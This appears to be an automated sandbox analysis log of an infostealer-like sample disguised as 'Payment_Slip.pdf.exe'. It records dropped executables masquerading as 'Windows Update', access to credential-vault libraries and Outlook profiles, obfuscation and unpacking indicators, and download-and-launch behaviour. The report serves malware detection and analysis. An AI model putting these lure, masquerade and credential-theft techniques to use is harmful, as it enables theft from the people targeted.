Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: pstorec.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: vaultcli.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: pstorec.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: vaultcli.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: vaultcli.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: vaultcli.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe File opened: C:\Users\user\Desktop\Payment_Slip.pdf.cfg
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\host.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Payment_Slip.pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Payment_Slip.pdf.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, TkYyY8ejXRydhTtm3i.cs .Net Code: mxE3KDYg98 System.Reflection.Assembly.Load(byte[])
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 11_2_0041A8DA
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_004000D8 push es; iretd 11_2_004000D9
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_0040008C push es; iretd 11_2_0040008D
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_004542E6 push ecx; ret 11_2_004542F9
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_0045B4FD push esi; ret 11_2_0045B506
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_00432BD6 push ecx; ret 11_2_00432BE9
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_00454C08 push eax; ret 11_2_00454C26
Source: C:\Users\user\AppData\Roaming\host.exe Code function: 12_2_007D3DF0 push esi; retn 0006h 12_2_007D3F6A
Source: C:\Users\user\AppData\Roaming\host.exe Code function: 12_2_007D40F9 push edi; retn 0006h 12_2_007D40FA
Source: C:\Users\user\AppData\Roaming\host.exe Code function: 12_2_007D5168 pushad ; retn 0006h 12_2_007D516A
Source: C:\Users\user\AppData\Roaming\host.exe Code function: 12_2_007D3D41 push ebp; retn 0006h 12_2_007D3D42
Source: C:\Users\user\AppData\Roaming\host.exe Code function: 12_2_007D3DE1 push esi; retn 0006h 12_2_007D3DE2
Source: C:\Users\user\AppData\Roaming\host.exe Code function: 12_2_007D3D81 push ebp; retn 0006h 12_2_007D3D82
Source: C:\Users\user\AppData\Roaming\host.exe Code function: 12_2_007D3E78 push esi; retn 0006h 12_2_007D3E7A
Source: C:\Users\user\AppData\Roaming\host.exe Code function: 12_2_067FB943 push es; ret 12_2_067FB950
Source: C:\Users\user\AppData\Roaming\host.exe Code function: 12_2_068377B4 push es; ret 12_2_068377C0
Source: C:\Users\user\AppData\Roaming\host.exe Code function: 12_2_068377DC push es; ret 12_2_068377C0
Source: C:\Users\user\AppData\Roaming\host.exe Code function: 12_2_06C35348 push edi; ret 12_2_06C35702
Source: C:\Users\user\AppData\Roaming\host.exe Code function: 12_2_06C3CF20 push 9806C22Ah; retf 12_2_06C3CF25
Source: C:\Users\user\AppData\Roaming\host.exe Code function: 12_2_06C3B248 push ss; retn 0006h 12_2_06C3B24A
Source: C:\Users\user\AppData\Roaming\host.exe Code function: 12_2_06C3A3A8 push cs; retn 0006h 12_2_06C3A3AA
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Code function: 13_2_05B28BEF push edi; retn 0000h 13_2_05B28BF1
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Code function: 13_2_0682F7D8 push eax; retn 0683h 13_2_0682F999
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Code function: 13_2_06827638 push esp; ret 13_2_06827685
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Code function: 13_2_06824085 push 8B000003h; iretd 13_2_0682408C
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Code function: 13_2_06A9BE78 push eax; ret 13_2_06A9BE79
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Code function: 13_2_06A90B33 push eax; iretd 13_2_06A90B39
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Code function: 13_2_06A948E1 push 7806AC64h; ret 13_2_06A948ED
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 14_2_0044693D push ecx; ret 14_2_0044694D
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 14_2_0044DB70 push eax; ret 14_2_0044DB84
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 14_2_0044DB70 push eax; ret 14_2_0044DBAC
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 14_2_00451D54 push eax; ret 14_2_00451D61
Source: Payment_Slip.pdf.exe Static PE information: section name: .text entropy: 7.92864214342551
Source: mHTmhPhJy.exe.0.dr Static PE information: section name: .text entropy: 7.92864214342551
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, y6YcC1IOBotyQaRh6iv.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UGqmJ8MBqD', 'wN4mQBplev', 'eibmxS6tNg', 'nEbmY9m5u9', 'cKpm1IjB4r', 'fvfmM2w59Q', 'kUWmFBbCUp'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, TkUSwEDOYAt7lMcOwY.cs High entropy of concatenated method names: 'NRA8pUUdsa', 'Aw68vN7LDN', 'KDM8neba9o', 'xeT8Dtl9Y1', 'UX687G7tUB', 'LsP85USCFS', 'OdF8gj36Yo', 'bOr8G9JObC', 'u278RGPWqT', 'A2j8mY130i'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, yKfW5T3tGnC6kmUxYP.cs High entropy of concatenated method names: 'XkvIj6t4op', 'bAoIe1Qtrx', 'COYITAt7lM', 'eOwIVYkAlm', 'IEFI7Ru15P', 'pZ5I5j5SaK', 'hdjSCBE87qxDviTt4R', 'x8QjfLcT4dJ3jgHCOK', 'hOkIIP0PWs', 'vHsIyAx3kT'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, KRVs7iYj6yPbNKa0Yl.cs High entropy of concatenated method names: 'rvC7bRxxO5', 'aYm7QEVGFS', 'oZU7YqDDGA', 'De3713rDtB', 'hFK7oLwpSy', 'jNY7UqLH7i', 'uyG7Bbiq90', 'dlx7sFbbJD', 'irp7iO4JBc', 'cR47AM11Ke'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, tqpMvgxuTt3IAmVCrg.cs High entropy of concatenated method names: 'mdfZnqQ9eo', 'r4nZDfEQbn', 'NM2Z0jxft6', 'MQqZoCJ597', 'FXVZBCOn8D', 'GwAZsP1aKJ', 'zvuZA8rWfc', 'XaWZSqqNGP', 'GAPZbYdVwt', 'KfZZJkRVHi'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, Gk9PdaMAVGGLVrsCuI.cs High entropy of concatenated method names: 'ToString', 'GBx5J3M3FH', 'y4g5ojIYbK', 'pOZ5Ue8nt0', 'ojx5BVZ8nf', 'mRe5sMisqQ', 'lip5iIkXTo', 'A9f5A3HKdF', 'IkI5S0Mn86', 'Rqd5HDRLNk'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, mL1yOx2rBFYlGxdGQM.cs High entropy of concatenated method names: 'eWjK6wMy8', 'BRZpmaJir', 'GAhv5Syb9', 'YdiE7VJiA', 'YCtD1RUOZ', 'h0whLHPGf', 'd81F6u1bwc0SAnwWb1', 'lnfZjLGrwRr5QTfwox', 'jxSGX1WmW', 'EF4mHcA6U'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, jU3mqX4JiC8fXaRuWG.cs High entropy of concatenated method names: 'oq3m8GhS2N', 'y8bmfylHu8', 'c84mtrInDC', 'JGEmjYGwsu', 'zOMmRWJOCN', 'OkymepOUDF', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, bJtGO9II6JaEOek5Jqh.cs High entropy of concatenated method names: 'q7um4o7aYo', 'BZomzrx2gO', 'YSqNOkrbVB', 'HwKNI7bGlc', 'DC1N2SnMOO', 'PZANy41hP3', 'bcsN3Kb0Nx', 'Ea1Ncu2SUS', 'TUeNwe8cwW', 'oFTNPPlQfa'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, WAlmw8hg1iD9JBEFRu.cs High entropy of concatenated method names: 'xiHf6olSRJ', 'IU5fEET5PG', 'WIM8UKvhB8', 'DRr8BONLdy', 'glm8sMFPeg', 'yRX8iqtX05', 'OI18A7rDtE', 'KS78SAjU6a', 'WVi8Hltphl', 'CBd8bOvTCa'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, TkYyY8ejXRydhTtm3i.cs High entropy of concatenated method names: 'cCVyc3lRiN', 'zTeywke01j', 'SBsyPGRBgf', 'wQhy8FpRGx', 'wO8yfLtUGT', 'oOZytcyA9G', 'UgFyjCmHVA', 'f7kyem263L', 'kqwydB6Lup', 'hQhyT0iZMy'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, nINbxJCQ3XxrE7Js03.cs High entropy of concatenated method names: 'BGqgWDwfC8', 'cStg4fumVv', 'if7GOqEG1O', 'G6CGIJENII', 'nbygJmdS3Z', 'nWogQEfY5R', 'Ix9gxcgPT6', 'oXcgYasOpV', 'HA5g16Oi35', 'TnVgMny3g6'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, Vex4ilFu8A9XAL3nwL.cs High entropy of concatenated method names: 'zOmgTGZimL', 'CB5gVgMSKh', 'ToString', 'X5Dgwj0tdk', 'jOZgPNwHFj', 'TlOg82CcIV', 'blogfLMNpv', 'XBFgtM8VnN', 'igAgjdDh3i', 'ichgexJKcY'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, MSJvbOHcHTO0c3bCdq.cs High entropy of concatenated method names: 'QO4jaretvn', 'jMGjqD98Of', 'MpbjKbm1Rc', 'V3wjp8uKh1', 'fKnj655umG', 'JthjvX3Vf4', 'p0WjEW0Eas', 'b51jnrqRVF', 'XG5jD3h7yy', 'UGqjhu5bfc'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, B6t4opnIAo1QtrxVaa.cs High entropy of concatenated method names: 'Ad8PYPNMSv', 'CJYP1UHGGf', 'MxcPM8bIAF', 'Y5yPFucZwN', 'E5QPlSIsoa', 'j9yPCnEMsh', 'mIlPk8F5LR', 'DC5PWDZvKJ', 'z5SPLb8Jay', 'vR9P413nj9'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, QnXqhezuvN7cIpValM.cs High entropy of concatenated method names: 'VlmmvXcQ5J', 'bAgmn9TmV9', 'IPZmDB51I7', 'OpGm08dtIS', 'AFamo7xICr', 'kokmBOL1h1', 'nI8msjCjni', 'PGPmXO928N', 'VW2masbI4o', 'hjSmqeHVg8'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, ijY91ePT8UGDHEvgSe.cs High entropy of concatenated method names: 'Dispose', 'v09ILg28Zp', 'RV02oNpKhO', 'TRM936xQoU', 'QnFI4Wp73l', 'TO7Iz7rI6g', 'ProcessDialogKey', 'toV2Onr9uJ', 'dfK2IUumCA', 'B0M22tU3mq'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, NSam4kI3GhkqpuZJciv.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'j6LuRxG8ip', 'lrXummPSHO', 'ssFuN73QJn', 'Q5iuuZE0AL', 'VnLursiNC9', 'Q3Tu9GtmGB', 'gCpuXGVGeS'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, sBkofI8Vdfu7QC8btk.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'cUm2LD7Rw5', 'i7b24pnTml', 'TTY2zK2dBK', 'u65yO0V4ia', 'Qs0yIbfPJj', 'xCqy2DrlnM', 'GdyyymARuD', 'RGITeyIoAWrcZ2DHY7i'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, o5Pu5QAYgvExHeVGbP.cs High entropy of concatenated method names: 'sWujw0pgrG', 'IdQj87lcB5', 'tVQjtDbXco', 'trat4eKBas', 'YLOtzXryjL', 'xrCjOtjNaQ', 'N8njI3u1I7', 'fd9j2eq6AF', 'LKTjycG0Yp', 'Fklj3ih7UU'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, fynTdqk87r09g28Zpx.cs High entropy of concatenated method names: 'XTqR7hVKJk', 'XiIRgU5848', 'D0VRRlrsZy', 'hF1RNqP4Ss', 'DepRrP3r2G', 'hr7RXgJvTJ', 'Dispose', 'lOcGwuiNT4', 'UctGP4gmkm', 'ChbG86Y8AZ'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, R5P5Z50j5SaKrgriEl.cs High entropy of concatenated method names: 'tlBtccHd4u', 'gL1tPfkvy3', 'SaKtffOlhm', 'jWvtjx9upP', 'TwxteyCRXA', 'IX2fljlhWy', 'Ft9fCHLZEO', 'oj8fkTSsOI', 'Qw9fWnDQ2a', 'eBMfLMSCUL'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, mnr9uJLyfKUumCAv0M.cs High entropy of concatenated method names: 'Y44R0aga1H', 'BjNRonM0LP', 'KMBRUBPGSD', 'J2wRBLoiwq', 'haSRsgNLrL', 'IKIRiKA5bX', 'UYwRARp4Pg', 'bpxRSudZcd', 'tMuRHnHE7J', 'sTZRbO6R0o'
Contains functionality to download and launch executables
